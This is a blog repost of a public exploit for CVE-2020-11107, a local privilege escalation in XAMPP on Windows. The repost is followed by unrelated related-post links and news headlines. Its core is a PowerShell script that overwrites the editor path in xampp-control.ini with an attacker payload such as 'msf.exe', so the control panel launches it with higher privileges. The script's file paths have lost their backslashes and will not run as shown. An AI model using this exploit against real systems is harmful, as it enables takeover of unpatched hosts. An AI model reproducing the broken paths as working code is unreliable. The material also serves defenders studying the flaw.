Cyber Security

XAMPP 7.4.3 Privilege Escalation

Avatar photo

Bybmalandrone

Sep 27, 2021 , , , ,
Authored by Salman Asad

XAMPP version 7.4.3 suffers from a local privilege escalation vulnerability.

advisories | CVE-2020-11107

# Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation
# Exploit Author: Salman Asad (@deathflash1411, [email protected])
# Original Author: Maximilian Barz (@S1lkys)
# Date: 27/09/2021
# Vendor Homepage: https://www.apachefriends.org
# Version: XAMPP < 7.2.29, 7.3.x < 7.3.16 & 7.4.x < 7.4.4
# Tested on: Windows 10 + XAMPP 7.3.10
# References: https://github.com/S1lkys/CVE-2020-11107
$file = "C:xamppxampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
# Insert your payload path here
$replace = "C:tempmsf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file

Related posts:

4 Critical Capabilities for a SaaS Security Posture Management (SSPM) Solution
5 Benefits Of SIEM To The Cybersecurity Of Any Business
How SSPM Simplifies Your SOC2 SaaS Security Posture Audit
On The Frontline in The War Against Hackers
7 Steps to Stronger SaaS Security

You missed

News The Blaze

Fauci’s empire exposed: How Trump can cure America’s health bureaucracy

Nov 22, 2024 theblaze
Fox News Politics Republican

PA Education Department agrees to cancel requirement for teachers to adopt guidelines deemed ‘woke’

Nov 22, 2024 foxnews.com
Fox News Politics Republican

Should women serve in combat? Military experts weigh in

Nov 22, 2024 foxnews.com
NBA Sports

Chris Paul, Victor Wembanyama and the duo that could change the NBA

Nov 21, 2024 espn.com